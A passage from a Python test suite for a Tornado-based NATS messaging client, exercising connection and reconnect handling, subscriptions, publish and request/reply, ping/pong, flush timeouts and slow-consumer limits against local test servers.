self.assertEqual(4222, uri.port)
self.assertEqual("", uri.username)
self.assertEqual(None, uri.password)
nc = NATS()
nc._setup_server_pool("@demo.nats.io:")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual(None, uri.username)
self.assertEqual(None, uri.password)
nc = NATS()
nc._setup_server_pool("@demo.nats.io")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual("", uri.username)
self.assertEqual(None, uri.password)
@tornado.testing.gen_test(timeout=5)
def test_connect_fails(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.disconnected_cb_called = False
def disconnected_cb(self):
self.disconnected_cb_called = True
client = SampleClient()
with self.assertRaises(ErrNoServers):
options = {
"servers": ["nats://127.0.0.1:4223"],
"close_cb": client.disconnected_cb,
"allow_reconnect": False,
"io_loop": self.io_loop
}
yield client.nc.connect(**options)
self.assertFalse(client.disconnected_cb_called)
@tornado.testing.gen_test(timeout=5)
def test_connect_fails_allow_reconnect(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.disconnected_cb_called = False
self.closed_cb_called = False
def disconnected_cb(self):
self.disconnected_cb_called = True
def closed_cb(self):
self.closed_cb_called = True
client = SampleClient()
with self.assertRaises(ErrNoServers):
options = {
"servers": ["nats://127.0.0.1:4223"],
"disconnected_cb": client.disconnected_cb,
"close_cb": client.closed_cb,
"allow_reconnect": True,
"io_loop": self.io_loop,
"max_reconnect_attempts": 2
}
yield client.nc.connect(**options)
self.assertFalse(client.disconnected_cb_called)
self.assertFalse(client.closed_cb_called)
@tornado.testing.gen_test(timeout=5)
def test_reconnect_fail_calls_closed_cb(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.disconnected_cb_called = tornado.concurrent.Future()
self.closed_cb_called = tornado.concurrent.Future()
def disconnected_cb(self):
if not self.disconnected_cb_called.done():
self.disconnected_cb_called.set_result(True)
def closed_cb(self):
if not self.closed_cb_called.done():
self.closed_cb_called.set_result(True)
c = SampleClient()
options = {
"servers": ["nats://127.0.0.1:4449"],
"closed_cb": c.closed_cb,
"disconnected_cb": c.disconnected_cb,
"allow_reconnect": True,
"loop": self.io_loop,
"max_reconnect_attempts": 2,
"reconnect_time_wait": 0.1
}
with Gnatsd(port=4449, http_port=8449, conf="") as natsd:
yield c.nc.connect(**options)
natsd.finish()
yield tornado.gen.with_timeout(timedelta(seconds=1), c.disconnected_cb_called)
yield tornado.gen.with_timeout(timedelta(seconds=2), c.closed_cb_called)
@tornado.testing.gen_test(timeout=5)
def test_connect_fails_allow_reconnect_forever_until_close(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.disconnected_cb_called = False
self.closed_cb_called = False
def disconnected_cb(self):
self.disconnected_cb_called = True
def close_cb(self):
self.closed_cb_called = True
client = SampleClient()
options = {
"servers": ["nats://127.0.0.1:4223"],
"close_cb": client.close_cb,
"disconnected_cb": client.disconnected_cb,
"allow_reconnect": True,
"io_loop": self.io_loop,
"max_reconnect_attempts": -1,
"reconnect_time_wait": 0.1
}
self.io_loop.spawn_callback(client.nc.connect, **options)
yield tornado.gen.sleep(2)
yield client.nc.close()
self.assertTrue(client.nc._server_pool[0].reconnects > 10)
self.assertTrue(client.disconnected_cb_called)
self.assertTrue(client.closed_cb_called)
@tornado.testing.gen_test
def test_iostream_closed_on_op_error(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertTrue(nc.is_connected)
self.assertEqual(nc.stats['reconnects'], 0)
old_io = nc.io
# Unbind and reconnect.
yield nc._process_op_err()
self.assertTrue(nc.is_connected)
self.assertEqual(nc.stats['reconnects'], 1)
self.assertTrue(old_io.closed())
self.assertFalse(nc.io.closed())
# Unbind, but don't reconnect.
nc.options["allow_reconnect"] = False
yield nc._process_op_err()
self.assertFalse(nc.is_connected)
self.assertTrue(nc.io.closed())
@tornado.testing.gen_test
def test_flusher_exits_on_op_error(self):
class FlusherClient(Client):
def __init__(self, *args, **kwargs):
super(FlusherClient, self).__init__(*args, **kwargs)
self.flushers_running = {}
@tornado.gen.coroutine
def _flusher_loop(self):
flusher_id = len(self.flushers_running)
self.flushers_running.update({flusher_id: True})
yield super(FlusherClient, self)._flusher_loop()
self.flushers_running.update({flusher_id: False})
nc = FlusherClient()
yield nc.connect(io_loop=self.io_loop)
self.assertTrue(nc.is_connected)
self.assertEqual(len(nc.flushers_running), 1)
self.assertTrue(nc.flushers_running[0])
# Unbind and reconnect.
yield nc._process_op_err()
self.assertTrue(nc.is_connected)
self.assertEqual(len(nc.flushers_running), 2)
self.assertFalse(nc.flushers_running[0])
self.assertTrue(nc.flushers_running[1])
# Unbind, but don't reconnect.
nc.options["allow_reconnect"] = False
yield nc._process_op_err()
yield tornado.gen.sleep(0.1)
self.assertFalse(nc.is_connected)
self.assertTrue(nc.io.closed())
self.assertEqual(len(nc.flushers_running), 2)
self.assertFalse(nc.flushers_running[0])
self.assertFalse(nc.flushers_running[1])
@tornado.testing.gen_test
def test_subscribe(self):
nc = Client()
options = {"io_loop": self.io_loop}
yield nc.connect(**options)
self.assertEqual(Client.CONNECTED, nc._status)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
inbox = new_inbox()
yield nc.subscribe("help.1")
yield nc.subscribe("help.2")
yield tornado.gen.sleep(0.5)
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/connz' % self.server_pool[0].http_port)
result = json.loads(response.body)
connz = result['connections'][0]
self.assertEqual(2, connz['subscriptions'])
@tornado.testing.gen_test
def test_subscribe_sync(self):
nc = Client()
msgs = []
@tornado.gen.coroutine
def subscription_handler(msg):
# Futures for subscription are each processed
# in sequence.
if msg.subject == "tests.1":
yield tornado.gen.sleep(1.0)
if msg.subject == "tests.3":
yield tornado.gen.sleep(1.0)
msgs.append(msg)
yield nc.connect(io_loop=self.io_loop)
sid = yield nc.subscribe("tests.>", cb=subscription_handler)
for i in range(0, 5):
yield nc.publish("tests.{0}".format(i), b'bar')
# Wait a bit for messages to be received.
yield tornado.gen.sleep(4.0)
self.assertEqual(5, len(msgs))
self.assertEqual("tests.1", msgs[1].subject)
self.assertEqual("tests.3", msgs[3].subject)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_sync_non_coro(self):
nc = Client()
msgs = []
def subscription_handler(msg):
# Callback blocks so dispatched in sequence.
if msg.subject == "tests.1":
time.sleep(0.5)
if msg.subject == "tests.3":
time.sleep(0.2)
msgs.append(msg)
yield nc.connect(io_loop=self.io_loop)
sid = yield nc.subscribe("tests.>", cb=subscription_handler)
for i in range(0, 5):
yield nc.publish("tests.{0}".format(i), b'bar')
# Wait a bit for messages to be received.
yield tornado.gen.sleep(4.0)
self.assertEqual(5, len(msgs))
self.assertEqual("tests.1", msgs[1].subject)
self.assertEqual("tests.3", msgs[3].subject)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_async(self):
nc = Client()
msgs = []
@tornado.gen.coroutine
def subscription_handler(msg):
# Callback dispatched asynchronously and a coroutine
# so it does not block.
if msg.subject == "tests.1":
yield tornado.gen.sleep(0.5)
if msg.subject == "tests.3":
yield tornado.gen.sleep(0.2)
msgs.append(msg)
yield nc.connect(io_loop=self.io_loop)
sid = yield nc.subscribe_async("tests.>", cb=subscription_handler)
for i in range(0, 5):
yield nc.publish("tests.{0}".format(i), b'bar')
# Wait a bit for messages to be received.
yield tornado.gen.sleep(4.0)
self.assertEqual(5, len(msgs))
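        # With concurrent dispatch, tests.1 (the slowest handler) is appended last (index 4),
        # while tests.3 (0.2s sleep) still ends up at index 3.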
self.assertEqual("tests.1", msgs[4].subject)
self.assertEqual("tests.3", msgs[3].subject)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_async_non_coro(self):
nc = Client()
msgs = []
def subscription_handler(msg):
# Dispatched asynchronously but would be received in sequence...
msgs.append(msg)
yield nc.connect(io_loop=self.io_loop)
sid = yield nc.subscribe_async("tests.>", cb=subscription_handler)
for i in range(0, 5):
yield nc.publish("tests.{0}".format(i), b'bar')
# Wait a bit for messages to be received.
yield tornado.gen.sleep(4.0)
self.assertEqual(5, len(msgs))
self.assertEqual("tests.1", msgs[1].subject)
self.assertEqual("tests.3", msgs[3].subject)
yield nc.close()
@tornado.testing.gen_test
def test_publish(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertEqual(Client.CONNECTED, nc._status)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
log = Log()
yield nc.subscribe(">", "", log.persist)
yield nc.publish("one", "hello")
yield nc.publish("two", "world")
yield tornado.gen.sleep(1.0)
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(10, varz['in_bytes'])
self.assertEqual(10, varz['out_bytes'])
self.assertEqual(2, varz['in_msgs'])
self.assertEqual(2, varz['out_msgs'])
self.assertEqual(2, len(log.records.keys()))
self.assertEqual("hello", log.records['one'][0].data)
self.assertEqual("world", log.records['two'][0].data)
self.assertEqual(10, nc.stats['in_bytes'])
self.assertEqual(10, nc.stats['out_bytes'])
self.assertEqual(2, nc.stats['in_msgs'])
self.assertEqual(2, nc.stats['out_msgs'])
@tornado.testing.gen_test(timeout=15)
def test_publish_race_condition(self):
# This tests a race condition fixed in #23 where a series of
# large publishes followed by a flush and another publish
# will cause the last publish to never get written.
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertTrue(nc.is_connected)
@tornado.gen.coroutine
def sub(msg):
sub.msgs.append(msg)
if len(sub.msgs) == 501:
sub.future.set_result(True)
sub.msgs = []
sub.future = tornado.concurrent.Future()
yield nc.subscribe("help.*", cb=sub)
# Close to 1MB payload
payload = "A" * 1000000
# Publish messages from 0..499
for i in range(500):
yield nc.publish("help.%s" % i, payload)
# Relinquish control often to unblock the flusher
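            # (tornado.gen.sleep(0) simply yields control back to the IOLoop for one turn.)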
yield tornado.gen.sleep(0)
yield nc.publish("help.500", "A")
# Wait for the future to yield after receiving all the messages.
try:
yield tornado.gen.with_timeout(timedelta(seconds=10), sub.future)
except:
# Skip timeout in case it may occur and let test fail
# when checking how many messages we received in the end.
pass
# We should definitely have all the messages
self.assertEqual(len(sub.msgs), 501)
for i in range(501):
self.assertEqual(sub.msgs[i].subject, u"help.%s" % (i))
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(500000001, varz['in_bytes'])
self.assertEqual(500000001, varz['out_bytes'])
self.assertEqual(501, varz['in_msgs'])
self.assertEqual(501, varz['out_msgs'])
self.assertEqual(500000001, nc.stats['in_bytes'])
self.assertEqual(500000001, nc.stats['out_bytes'])
self.assertEqual(501, nc.stats['in_msgs'])
self.assertEqual(501, nc.stats['out_msgs'])
@tornado.testing.gen_test(timeout=15)
def test_publish_flush_race_condition(self):
# This tests a race condition fixed in #23 where a series of
# large publishes followed by a flush and another publish
# will cause the last publish to never get written.
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertTrue(nc.is_connected)
@tornado.gen.coroutine
def sub(msg):
sub.msgs.append(msg)
if len(sub.msgs) == 501:
sub.future.set_result(True)
sub.msgs = []
sub.future = tornado.concurrent.Future()
yield nc.subscribe("help.*", cb=sub)
# Close to 1MB payload
payload = "A" * 1000000
# Publish messages from 0..499
for i in range(500):
yield nc.publish("help.%s" % i, payload)
if i % 10 == 0:
# Relinquish control often to unblock the flusher
yield tornado.gen.sleep(0)
yield nc.publish("help.500", "A")
# Flushing and doing ping/pong should not cause commands
# to be dropped either.
yield nc.flush()
# Wait for the future to yield after receiving all the messages.
try:
yield tornado.gen.with_timeout(timedelta(seconds=10), sub.future)
except:
# Skip timeout in case it may occur and let test fail
# when checking how many messages we received in the end.
pass
# We should definitely have all the messages
self.assertEqual(len(sub.msgs), 501)
for i in range(501):
self.assertEqual(sub.msgs[i].subject, u"help.%s" % (i))
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(500000001, varz['in_bytes'])
self.assertEqual(500000001, varz['out_bytes'])
self.assertEqual(501, varz['in_msgs'])
self.assertEqual(501, varz['out_msgs'])
self.assertEqual(500000001, nc.stats['in_bytes'])
self.assertEqual(500000001, nc.stats['out_bytes'])
self.assertEqual(501, nc.stats['in_msgs'])
self.assertEqual(501, nc.stats['out_msgs'])
@tornado.testing.gen_test
def test_unsubscribe(self):
nc = Client()
options = {"io_loop": self.io_loop}
yield nc.connect(**options)
log = Log()
sid = yield nc.subscribe("foo", cb=log.persist)
yield nc.publish("foo", b'A')
yield nc.publish("foo", b'B')
yield tornado.gen.sleep(1)
sub = nc._subs[sid]
yield nc.unsubscribe(sid)
yield nc.flush()
self.assertEqual(sub.closed, True)
yield nc.publish("foo", b'C')
yield nc.publish("foo", b'D')
self.assertEqual(2, len(log.records["foo"]))
self.assertEqual(b'A', log.records["foo"][0].data)
self.assertEqual(b'B', log.records["foo"][1].data)
# Should not exist by now
with self.assertRaises(KeyError):
nc._subs[sid].received
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/connz' % self.server_pool[0].http_port)
result = json.loads(response.body)
connz = result['connections'][0]
self.assertEqual(0, connz['subscriptions'])
@tornado.testing.gen_test
def test_unsubscribe_only_if_max_reached(self):
nc = Client()
options = {"io_loop": self.io_loop}
yield nc.connect(**options)
log = Log()
sid = yield nc.subscribe("foo", cb=log.persist)
yield nc.publish("foo", b'A')
yield nc.publish("foo", b'B')
yield nc.publish("foo", b'C')
yield tornado.gen.sleep(1)
self.assertEqual(3, len(log.records["foo"]))
sub = nc._subs[sid]
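        # unsubscribe(sid, 3) sets an auto-unsubscribe limit of 3 messages; three messages have
        # already been received, so the subscription is expected to be closed immediately.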
yield nc.unsubscribe(sid, 3)
self.assertEqual(sub.closed, True)
yield nc.publish("foo", b'D')
yield nc.flush()
self.assertEqual(3, len(log.records["foo"]))
self.assertEqual(b'A', log.records["foo"][0].data)
self.assertEqual(b'B', log.records["foo"][1].data)
self.assertEqual(b'C', log.records["foo"][2].data)
# Should not exist by now
yield tornado.gen.sleep(1)
with self.assertRaises(KeyError):
nc._subs[sid].received
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/connz' % self.server_pool[0].http_port)
result = json.loads(response.body)
connz = result['connections'][0]
self.assertEqual(0, connz['subscriptions'])
@tornado.testing.gen_test
def test_request(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
class Component:
def __init__(self, nc):
self.nc = nc
self.replies = []
@tornado.gen.coroutine
def receive_responses(self, msg=None):
self.replies.append(msg)
@tornado.gen.coroutine
def respond(self, msg=None):
yield self.nc.publish(msg.reply, "ok:1")
yield self.nc.publish(msg.reply, "ok:2")
yield self.nc.publish(msg.reply, "ok:3")
log = Log()
c = Component(nc)
yield nc.subscribe(">", "", log.persist)
yield nc.subscribe("help", "", c.respond)
yield nc.request("help", "please", expected=2, cb=c.receive_responses)
subs = []
for _, sub in nc._subs.items():
subs.append(sub)
self.assertEqual(len(subs), 3)
yield tornado.gen.sleep(0.5)
self.assertEqual(len(self.io_loop._callbacks), 0)
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(18, varz['in_bytes'])
self.assertEqual(32, varz['out_bytes'])
self.assertEqual(4, varz['in_msgs'])
self.assertEqual(7, varz['out_msgs'])
self.assertEqual(2, len(log.records.keys()))
self.assertEqual("please", log.records['help'][0].data)
self.assertEqual(2, len(c.replies))
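        # Note the mirrored perspective: the server's in_bytes/in_msgs (varz) correspond to the
        # client's out_bytes/out_msgs, and vice versa.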
self.assertEqual(32, nc.stats['in_bytes'])
self.assertEqual(18, nc.stats['out_bytes'])
self.assertEqual(7, nc.stats['in_msgs'])
self.assertEqual(4, nc.stats['out_msgs'])
full_msg = ''
for msg in log.records['help']:
full_msg += msg.data
self.assertEqual('please', full_msg)
self.assertEqual("ok:1", c.replies[0].data)
self.assertEqual("ok:2", c.replies[1].data)
yield nc.close()
@tornado.testing.gen_test
def test_timed_request(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
class Component:
def __init__(self, nc):
self.nc = nc
@tornado.gen.coroutine
def respond(self, msg=None):
yield self.nc.publish(msg.reply, "ok:1")
yield self.nc.publish(msg.reply, "ok:2")
yield self.nc.publish(msg.reply, "ok:3")
log = Log()
c = Component(nc)
yield nc.subscribe(">", "", log.persist)
yield nc.subscribe("help", "", c.respond)
reply = yield nc.timed_request("help", "please")
self.assertEqual("ok:1", reply.data)
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(18, varz['in_bytes'])
self.assertEqual(28, varz['out_bytes'])
self.assertEqual(4, varz['in_msgs'])
self.assertEqual(6, varz['out_msgs'])
self.assertEqual(2, len(log.records.keys()))
self.assertEqual("please", log.records['help'][0].data)
self.assertEqual(28, nc.stats['in_bytes'])
self.assertEqual(18, nc.stats['out_bytes'])
self.assertEqual(6, nc.stats['in_msgs'])
self.assertEqual(4, nc.stats['out_msgs'])
full_msg = ''
for msg in log.records['help']:
full_msg += msg.data
self.assertEqual('please', full_msg)
# There should not be lingering inboxes with requests by default
self.assertEqual(len(c.nc._subs), 2)
@tornado.testing.gen_test
def test_publish_max_payload(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertEqual(Client.CONNECTED, nc._status)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
with self.assertRaises(ErrMaxPayload):
yield nc.publish("large-message",
"A" * (nc._server_info["max_payload"] * 2))
@tornado.testing.gen_test
def test_publish_request(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertEqual(Client.CONNECTED, nc._status)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
inbox = new_inbox()
yield nc.publish_request("help.1", inbox, "hello")
yield nc.publish_request("help.2", inbox, "world")
yield tornado.gen.sleep(1.0)
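        # Nothing is subscribed to these subjects, so the server receives the two messages but
        # delivers none of them (out_msgs/out_bytes stay at 0).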
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(10, varz['in_bytes'])
self.assertEqual(0, varz['out_bytes'])
self.assertEqual(2, varz['in_msgs'])
self.assertEqual(0, varz['out_msgs'])
self.assertEqual(0, nc.stats['in_bytes'])
self.assertEqual(10, nc.stats['out_bytes'])
self.assertEqual(0, nc.stats['in_msgs'])
self.assertEqual(2, nc.stats['out_msgs'])
@tornado.testing.gen_test
def test_customize_io_buffers(self):
class Component():
def __init__(self):
self.nc = Client()
self.errors = []
self.disconnected_cb_called = 0
self.closed_cb_called = 0
def error_cb(self, e):
self.errors.append(e)
def close_cb(self):
self.closed_cb_called += 1
def disconnected_cb(self):
self.disconnected_cb_called += 1
c = Component()
options = {
"io_loop": self.io_loop,
"max_read_buffer_size": 1024,
"max_write_buffer_size": 50,
"read_chunk_size": 10,
"error_cb": c.error_cb,
"close_cb": c.close_cb,
"disconnected_cb": c.disconnected_cb
}
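        # The 50-byte write buffer is smaller than even the initial CONNECT command, so the
        # connect attempt is expected to overflow tornado's write buffer (hence StreamBufferFullError).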
with self.assertRaises(tornado.iostream.StreamBufferFullError):
yield c.nc.connect(**options)
self.assertFalse(c.nc.is_connected)
self.assertEqual(1024, c.nc._max_read_buffer_size)
self.assertEqual(50, c.nc._max_write_buffer_size)
self.assertEqual(10, c.nc._read_chunk_size)
@tornado.testing.gen_test
def test_default_ping_interval(self):
class Parser():
def __init__(self, nc, t):
self.nc = nc
self.t = t
@tornado.gen.coroutine
def parse(self, data=''):
self.t.assertEqual(1, len(self.nc._pongs))
yield self.nc._process_pong()
self.t.assertEqual(0, len(self.nc._pongs))
nc = Client()
nc._ps = Parser(nc, self)
yield nc.connect(io_loop=self.io_loop)
yield tornado.gen.sleep(1)
self.assertEqual(0, nc._pings_outstanding)
self.assertTrue(nc.is_connected)
@tornado.testing.gen_test
def test_custom_ping_interval(self):
# Wait to be disconnected due to ignoring pings.
disconnected = tornado.concurrent.Future()
class Parser():
def __init__(self, nc):
self.nc = nc
self.pongs = []
@tornado.gen.coroutine
def parse(self, data=''):
if b'PONG' in data:
self.pongs.append(data)
yield self.nc._process_pong()
def disconnected_cb():
if not disconnected.done():
disconnected.set_result(True)
nc = NATS()
nc._ps = Parser(nc)
yield nc.connect(
loop=self.io_loop,
ping_interval=0.1,
max_outstanding_pings=10,
disconnected_cb=disconnected_cb,
)
yield tornado.gen.with_timeout(timedelta(seconds=5), disconnected)
self.assertTrue(len(nc._ps.pongs) > 5)
yield nc.close()
@tornado.testing.gen_test
def test_ping_slow_replies(self):
pongs = []
class Parser():
def __init__(self, nc):
self.nc = nc
@tornado.gen.coroutine
def parse(self, data=''):
pongs.append(data) # but, don't process now
nc = Client()
nc._ps = Parser(nc)
yield nc.connect(
io_loop=self.io_loop, ping_interval=0.1, max_outstanding_pings=20)
yield tornado.gen.sleep(1)
# Should have received more than 5 pongs, but processed none.
self.assertTrue(len(pongs) > 5)
self.assertTrue(len(pongs) <= nc._pings_outstanding)
self.assertEqual(0, nc._pongs_received)
self.assertEqual(len(nc._pongs), nc._pings_outstanding)
# Process all that were sent.
expected_outstanding = nc._pings_outstanding
for i in range(nc._pings_outstanding):
yield nc._process_pong()
expected_outstanding -= 1
self.assertEqual(expected_outstanding, nc._pings_outstanding)
self.assertEqual(expected_outstanding, len(nc._pongs))
self.assertEqual(i + 1, nc._pongs_received)
@tornado.testing.gen_test
def test_flush_timeout(self):
class Parser():
def __init__(self, nc, t):
self.nc = nc
self.t = t
@tornado.gen.coroutine
def parse(self, data=''):
yield tornado.gen.sleep(2.0)
yield self.nc._process_pong()
nc = Client()
nc._ps = Parser(nc, self)
yield nc.connect(io_loop=self.io_loop)
with self.assertRaises(tornado.gen.TimeoutError):
yield nc.flush(timeout=1)
self.assertEqual(0, len(nc._pongs))
@tornado.testing.gen_test(timeout=15)
def test_flush_timeout_lost_message(self):
class Parser():
def __init__(self, nc):
self.nc = nc
self.drop_messages = False
@tornado.gen.coroutine
def parse(self, data=''):
if not self.drop_messages:
yield self.nc._process_pong()
nc = Client()
nc._ps = Parser(nc)
yield nc.connect(loop=self.io_loop)
nc._ps.drop_messages = True
with self.assertRaises(tornado.gen.TimeoutError):
yield nc.flush(timeout=1)
self.assertEqual(0, len(nc._pongs))
self.assertEqual(0, nc._pings_outstanding)
self.assertEqual(0, nc._pongs_received)
# Successful flush must clear timed out pong and the new one.
nc._ps.drop_messages = False
try:
yield nc.flush(timeout=1)
finally:
self.assertEqual(0, len(nc._pongs))
self.assertEqual(0, nc._pings_outstanding)
self.assertEqual(1, nc._pongs_received)
@tornado.testing.gen_test
def test_timed_request_timeout(self):
class Parser():
def __init__(self, nc, t):
self.nc = nc
self.t = t
def parse(self, data=''):
self.nc._process_pong()
nc = Client()
nc._ps = Parser(nc, self)
yield nc.connect(io_loop=self.io_loop)
with self.assertRaises(tornado.gen.TimeoutError):
yield nc.timed_request("hello", "world", timeout=0.5)
@tornado.testing.gen_test
def test_process_message_subscription_not_present(self):
nc = Client()
yield nc._process_msg(387, 'some-subject', 'some-reply', [0, 1, 2])
@tornado.testing.gen_test
def test_subscribe_async_process_messages_concurrently(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
@tornado.gen.coroutine
def sub_foo_handler(msg):
msgs = sub_foo_handler.msgs
msgs.append(msg)
# Should not block other subscriptions processing
# the messages in parallel...
yield tornado.gen.sleep(1)
sub_foo_handler.msgs = []
yield nc.subscribe("foo", cb=sub_foo_handler)
@tornado.gen.coroutine
def sub_bar_handler(msg):
nc = sub_bar_handler.nc
msgs = sub_bar_handler.msgs
msgs.append(msg)
yield nc.publish(msg.reply, "OK!")
sub_bar_handler.nc = nc
sub_bar_handler.msgs = []
yield nc.subscribe("bar", cb=sub_bar_handler)
@tornado.gen.coroutine
def sub_quux_handler(msg):
msgs = sub_quux_handler.msgs
msgs.append(msg)
sub_quux_handler.msgs = []
yield nc.subscribe("quux", cb=sub_quux_handler)
yield nc.publish("foo", "hello")
for i in range(0, 10):
yield nc.publish("quux", "test-{}".format(i))
response = yield nc.request("bar", b'help')
self.assertEqual(response.data, 'OK!')
yield tornado.gen.sleep(0.2)
self.assertEqual(len(sub_foo_handler.msgs), 1)
self.assertEqual(len(sub_bar_handler.msgs), 1)
self.assertEqual(len(sub_quux_handler.msgs), 10)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_slow_consumer_pending_msgs_limit(self):
nc = Client()
def error_cb(err):
error_cb.errors.append(err)
error_cb.errors = []
yield nc.connect(io_loop=self.io_loop, error_cb=error_cb)
@tornado.gen.coroutine
def sub_hello_handler(msg):
msgs = sub_hello_handler.msgs
msgs.append(msg)
if len(msgs) == 5:
yield tornado.gen.sleep(0.5)
sub_hello_handler.msgs = []
yield nc.subscribe("hello", cb=sub_hello_handler, pending_msgs_limit=5)
for i in range(0, 20):
yield nc.publish("hello", "test-{}".format(i))
yield nc.flush(1)
# Wait a bit for subscriber to recover
yield tornado.gen.sleep(0.5)
for i in range(0, 3):
yield nc.publish("hello", "ok-{}".format(i))
yield nc.flush(1)
# Wait a bit to receive the final messages
yield tornado.gen.sleep(0.5)
# There would be a few async slow consumer errors
errors = error_cb.errors
self.assertTrue(len(errors) > 0)
self.assertTrue(type(errors[0]) is ErrSlowConsumer)
# We should have received some messages and dropped others,
# but definitely got the last 3 messages after recovering
# from the slow consumer error.
msgs = sub_hello_handler.msgs
self.assertEqual(len(msgs), 13)
msgs = sub_hello_handler.msgs[-3:]
for i in range(0, 3):
self.assertEqual("ok-{}".format(i), msgs[i].data)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_slow_consumer_pending_bytes_limit(self):
nc = Client()
def error_cb(err):
error_cb.errors.append(err)
error_cb.errors = []
yield nc.connect(io_loop=self.io_loop, error_cb=error_cb)
@tornado.gen.coroutine
def sub_hello_handler(msg):
msgs = sub_hello_handler.msgs
msgs.append(msg)
sub_hello_handler.data += msg.data
if len(sub_hello_handler.data) == 10:
yield tornado.gen.sleep(0.5)
sub_hello_handler.msgs = []
sub_hello_handler.data = ''
yield nc.subscribe(
"hello", cb=sub_hello_handler, pending_bytes_limit=10)
for i in range(0, 20):
yield nc.publish("hello", "A")
yield nc.flush(1)
# Wait a bit for subscriber to recover
yield tornado.gen.sleep(1)
for i in range(0, 3):
yield nc.publish("hello", "B")
yield nc.flush(1)
# Wait a bit to receive the final messages
yield tornado.gen.sleep(1)
# There would be a few async slow consumer errors
errors = error_cb.errors
self.assertTrue(len(errors) > 0)
self.assertTrue(type(errors[0]) is ErrSlowConsumer)
# We should have received some messages and dropped others,
# but definitely got the last 3 messages after recovering
# from the slow consumer error.
msgs = sub_hello_handler.msgs
self.assertTrue(len(msgs) > 10 and len(msgs) != 23)
msgs = sub_hello_handler.msgs[-3:]
for i in range(0, 3):
self.assertEqual("B", msgs[i].data)
yield nc.close()
@tornado.testing.gen_test
def test_close_stops_subscriptions_loops(self):
nc = Client()
def error_cb(err):
error_cb.errors.append(err)
error_cb.errors = []
yield nc.connect(io_loop=self.io_loop, error_cb=error_cb)
@tornado.gen.coroutine
def sub_hello_handler(msg):
msgs = sub_hello_handler.msgs
msgs.append(msg)
sub_hello_handler.msgs = []
yield nc.subscribe("hello.foo.bar", cb=sub_hello_handler)
yield nc.subscribe("hello.*.*", cb=sub_hello_handler)
yield nc.subscribe("hello.>", cb=sub_hello_handler)
yield nc.subscribe(">", cb=sub_hello_handler)
for i in range(0, 10):
yield nc.publish("hello.foo.bar", "test-{}".format(i))
yield nc.flush(1)
msgs = sub_hello_handler.msgs
self.assertEqual(len(msgs), 40)
self.assertEqual(len(nc._subs), 4)
subs = []
for _, sub in nc._subs.items():
subs.append(sub)
self.assertEqual(sub.closed, False)
yield nc.close()
# Close should have removed all subscriptions
self.assertEqual(len(nc._subs), 0)
# Let background message processors stop
yield tornado.gen.sleep(0)
self.assertEqual(len(self.io_loop._callbacks), 0)
for sub in subs:
self.assertEqual(sub.closed, True)
@tornado.testing.gen_test(timeout=10)
def test_subscribe_no_echo(self):
nc = NATS()
msgs = []
nc2 = NATS()
msgs2 = []
@tornado.gen.coroutine
def subscription_handler(msg):
msgs.append(msg)
@tornado.gen.coroutine
def subscription_handler2(msg):
msgs2.append(msg)
yield nc.connect(loop=self.io_loop, no_echo=True)
sid = yield nc.subscribe("foo", cb=subscription_handler)
yield nc.flush()
yield nc2.connect(loop=self.io_loop, no_echo=False)
sid2 = yield nc2.subscribe("foo", cb=subscription_handler2)
yield nc2.flush()
payload = b'hello world'
for i in range(0, 10):
yield nc.publish("foo", payload)
yield nc.flush()
# Wait a bit for message to be received.
yield tornado.gen.sleep(0.5)
self.assertEqual(0, len(msgs))
self.assertEqual(10, len(msgs2))
self.assertEqual(0, nc._subs[sid].received)
        self.assertEqual(10, nc2._subs[sid2].received)
yield nc.close()
yield nc2.close()
self.assertEqual(0, nc.stats['in_msgs'])
self.assertEqual(0, nc.stats['in_bytes'])
self.assertEqual(10, nc.stats['out_msgs'])
self.assertEqual(110, nc.stats['out_bytes'])
